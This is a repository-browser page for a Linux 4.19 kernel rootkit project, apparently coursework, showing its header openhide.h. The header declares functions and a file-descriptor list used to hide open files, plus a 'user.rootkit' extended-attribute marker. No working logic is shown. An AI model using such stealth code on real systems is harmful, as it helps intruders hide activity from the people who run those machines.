linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

openhide.h (769B)

      1 #ifndef _GROUP7_OPENHIDE_H
      2 #define _GROUP7_OPENHIDE_H
      3 
      4 #include <linux/types.h>
      5 
      6 #define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))
      7 #define G7_XATTR_NAME "user.rootkit"
      8 #define G7_XATTR_VAL  "rootkit"
      9 
     10 #define BUFLEN 512
     11 
     12 typedef struct fd_list *fd_list_t_ptr;
     13 typedef struct fd_list {
     14     int fd;
     15     fd_list_t_ptr prev;
     16     fd_list_t_ptr next;
     17 } fd_list_t;
     18 
     19 extern fd_list_t hidden_fds;
     20 
     21 void hide_open(void);
     22 void unhide_open(void);
     23 
     24 pid_t may_fd(struct file *);
     25 void fill_fds(pid_t);
     26 
     27 void clear_hidden_fds(void);
     28 bool list_contains_fd(fd_list_t_ptr, int);
     29 
     30 fd_list_t_ptr find_fd_in_list(fd_list_t_ptr, int);
     31 fd_list_t_ptr add_fd_to_list(fd_list_t_ptr, int);
     32 fd_list_t_ptr remove_fd_from_list(fd_list_t_ptr list, int fd);
     33 
     34 #endif//_GROUP7_OPENHIDE_H